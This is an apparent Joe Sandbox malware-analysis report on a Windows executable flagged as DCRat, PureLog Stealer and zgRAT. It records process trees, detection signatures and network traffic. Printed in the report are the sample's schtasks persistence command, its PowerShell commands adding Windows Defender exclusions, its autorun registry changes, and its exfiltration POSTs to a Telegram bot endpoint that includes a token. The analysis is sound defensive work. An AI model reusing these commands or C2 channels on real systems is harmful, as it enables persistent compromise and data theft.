Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LzmJLVB41K.exe

Overview

General Information

Sample name:LzmJLVB41K.exe
renamed because original name is a hash value
Original sample name:2d756772bc00e5778d794c107358ddf7.exe
Analysis ID:1557447
MD5:2d756772bc00e5778d794c107358ddf7
SHA1:77229fc9ceeb137c6644a4fa3085aecabaf94ec3
SHA256:a7f4c48301ad6b01c8777427eaceb965a9e0c14d493f44d1dea4f8d498123469
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LzmJLVB41K.exe (PID: 2016 cmdline: "C:\Users\user\Desktop\LzmJLVB41K.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
    • schtasks.exe (PID: 2664 cmdline: schtasks.exe /create /tn "fozAQGvSmfTQIywuzSgkf" /sc MINUTE /mo 8 /tr "'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 3816 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6492 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6584.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 2300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A18.tmp" "c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 4780 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8044 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 1588 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ctfmon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5896 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2664 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\LzmJLVB41K.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7408 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7652 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7740 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 2632 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 3648 cmdline: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 3192 cmdline: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 1220 cmdline: C:\Recovery\ctfmon.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 3172 cmdline: C:\Recovery\ctfmon.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fontdrvhost.exe (PID: 3984 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • fontdrvhost.exe (PID: 1268 cmdline: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • LzmJLVB41K.exe (PID: 432 cmdline: C:\Users\user\Desktop\LzmJLVB41K.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • LzmJLVB41K.exe (PID: 4372 cmdline: C:\Users\user\Desktop\LzmJLVB41K.exe MD5: 2D756772BC00E5778D794C107358DDF7)
  • fozAQGvSmfTQIywuzSgk.exe (PID: 7884 cmdline: "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • ctfmon.exe (PID: 7020 cmdline: "C:\Recovery\ctfmon.exe" MD5: 2D756772BC00E5778D794C107358DDF7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
LzmJLVB41K.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    LzmJLVB41K.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\ctfmon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Recovery\ctfmon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: LzmJLVB41K.exe PID: 2016JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.LzmJLVB41K.exe.9e0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.LzmJLVB41K.exe.9e0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetFilename: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fozAQGvSmfTQIywuzSgk
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", ProcessId: 3816, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\LzmJLVB41K.exe, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\fozAQGvSmfTQIywuzSgk.exe', ProcessId: 4780, ProcessName: powershell.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\LzmJLVB41K.exe", ParentImage: C:\Users\user\Desktop\LzmJLVB41K.exe, ParentProcessId: 2016, ParentProcessName: LzmJLVB41K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline", ProcessId: 3816, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-18T09:17:41.336700+010020480951A Network Trojan was detected192.168.2.64987837.44.238.25080TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-18T09:17:12.477401+010028033053Unknown Traffic192.168.2.64973334.117.59.81443TCP
                            2024-11-18T09:18:14.875621+010028033053Unknown Traffic192.168.2.64999134.117.59.81443TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: LzmJLVB41K.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\ctfmon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.batAvira: detection malicious, Label: BAT/Delbat.C
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeReversingLabs: Detection: 65%
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeReversingLabs: Detection: 65%
                            Source: C:\Recovery\ctfmon.exeReversingLabs: Detection: 65%
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\KlfRTWYv.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\QMBYhgjh.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\zxBbjKdN.logReversingLabs: Detection: 50%
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeReversingLabs: Detection: 65%
                            Multi AV Scanner detection for submitted file
                            Source: LzmJLVB41K.exeReversingLabs: Detection: 65%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exeJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJoe Sandbox ML: detected
                            Source: C:\Recovery\ctfmon.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: LzmJLVB41K.exeJoe Sandbox ML: detected
                            Source: LzmJLVB41K.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94Jump to behavior
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49990 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49993 version: TLS 1.2
                            Source: LzmJLVB41K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49878 -> 37.44.238.250:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926"Host: api.telegram.orgContent-Length: 100534Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="e2171771-5cfd-4b96-afc0-02258389f03e"Host: api.telegram.orgContent-Length: 103439Expect: 100-continueConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                            Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ipinfo.io
                            Source: unknownDNS query: name: ipinfo.io
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49733 -> 34.117.59.81:443
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49991 -> 34.117.59.81:443
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: unknownHTTP traffic detected: POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926"Host: api.telegram.orgContent-Length: 100534Expect: 100-continueConnection: Keep-Alive
                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.000000000342E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                            Source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                            Source: powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
